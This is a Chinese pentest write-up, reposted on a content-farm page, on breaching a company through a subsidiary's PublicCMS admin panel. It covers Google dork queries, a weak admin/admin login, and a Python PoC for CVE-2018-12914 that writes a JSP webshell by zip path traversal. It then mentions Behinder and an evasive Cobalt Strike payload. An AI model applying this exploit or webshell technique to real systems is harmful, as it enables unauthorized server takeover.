当前位置: 首页 > news >正文

做印刷网站公司简介官方网站建设优化

做印刷网站公司简介,官方网站建设优化,建商城网站带app多少钱,wordpress适应式网站博客模板信息收集 某企业提供信息:企业官网的真实外网ip,内网ip 企业官网比较硬,从控股超过51%的子公司入手 通过企查查找到一堆控股高的子公司,通过ICP/IP地址/域名信息备案管理系统查找子公司官网,收集二级域名。通过google…

信息收集

某企业提供信息:企业官网的真实外网ip,内网ip

企业官网比较硬,从控股超过51%的子公司入手

通过企查查找到一堆控股高的子公司,通过ICP/IP地址/域名信息备案管理系统查找子公司官网,收集二级域名。通过googlehacking查找登录页面,发现一个管理后台登录页面

site:target.com intext:管理 | 后台 | 后台管理 | 登陆 | 登录 | 用户名 | 密码 | 系统 | 账号 | login | system
site:target.com inurl:login | inurl:admin | inurl:manage | inurl:manager | inurl:admin_login | inurl:system | inurl:backend
site:target.com intitle:管理 | 后台 | 后台管理 | 登陆 | 登录

登录页面没有任何验证码,bp进行弱密码爆破

admin/admin

登录后台发现是一个publiccms,可以查看web下的静态文件和执行sql,查找框架相关漏洞

根据数据目录可以知道上传的文件目录不在web目录下,所以直接上传jsp木马无效

在这里插入图片描述

CVE-2018-12914

漏洞编号:CVE-2018-12914

漏洞危害:用户通过在压缩文件中构造包含有特定文件名称的压缩文件时,在进行解压时,会导致跨目录任意写入文件漏洞的攻击。

影响版本:PublicCMS V4.0.20180210

漏洞加固:更新到最新版本 。对比补丁,发现在获取压缩文件中的文件名字时,如果其中含有”…”时则被替换为空。

漏洞原因

controller目录下\admin\cms\CmsWebFileAdminController.java代码里的uzip调用方式上出现了漏洞,该系统采用的是dounzip的方式去调用,dounzip是解压缩常用到的,导致我们可以构造特殊的文件名,来将我们的脚本木马上传到网站任意目录下。

该代码通过获取targetPath的上传路径值与压缩文件里的名字进行自动拼接,在拼接的这个过程当中,…/ 可以对目录进行跨站。网站漏洞产生最根本的原因就是在处理这个压缩文件的时候并没有对压缩里的文件名进行判断与过滤,导致可以使用特殊的文件名进行定义,并传入到服务器后端执行代码,通过上传JSP木马后门,可以直接对服务器进行控制,危害性较高。

getshell

poc

import zipfileif __name__ == "__main__":try:binary = 'coelak'     //木马内容zipFile = zipfile.ZipFile("test.zip", "a", zipfile.ZIP_DEFLATED)info = zipfile.ZipInfo("test.zip")zipFile.writestr("../../../../../../cmd.jsp", binary)zipFile.close()except IOError as e:raise e

构造一个zip压缩文件,里面的文件名为

../../../../../../../../工作站目录/webapps/publiccms/cccaaacoleak.jsp

上传该zip文件,上传和解压,cccaaacoleak.jsp会写入在publiccms目录下。成功getshell,连接冰蝎

然后上传免杀cs马,进行内网渗透了。

http://www.yayakq.cn/news/646264/

相关文章:

  • 做网站做app区别网页框架
  • 汕头论坛建站模板胶州做网站的
  • dede 建设网站做宴会有哪些素材网站
  • 举报网站建设情况wordpress广告设置
  • 织梦响应式网站模板河北提供网站制作公司哪家专业
  • 做网站的的步骤怎么写网络广告推广策划
  • 查询公司的网站视频 收费 网站怎么做
  • 可视化的做网站的app甘肃企业模板建站信息
  • 做pc端网站用什么框架推广公司名字
  • 网站开发用什么语言写国外外包网站
  • 安徽网站关键词优化重庆手机网站推广方法
  • 室内装修设计软件app哪个好seo外链工具
  • 阜新旅游网站建设织梦网站上传图片不行
  • 青岛做门户网站的有哪些成都网站开发培训多少钱
  • 矢量网站动画怎么做学编程能干什么
  • 手机网站关键词排名网站开发的项目总结
  • 做营销型网站要多少钱青岛黄岛网站建设公司电话
  • 自学网站开发软件开发开源wordpress
  • 做企业网站需要提供什么网站开发的发展趋势
  • 网站添加google地图绿色长春app
  • 深圳华强北商城网站建设网站设计版式
  • 电工培训优化seo排名
  • seo学习网站网络营销案例成功案例分析
  • 泉州网站建设方案维护网站开发需要多钱
  • 网站建设常用模板下载河北建设工程信息网官网 费用中项网
  • 网站开发应聘问题网站备案后更换主机
  • 有做分期海淘的网站吗宝安西乡网站建设
  • 培训网站泉州网站建设报价
  • 石油化工工程建设人才招聘网站哪个网站的pc端是用vue做的
  • 做百度药材种苗网站深圳专业做网站和seo的公司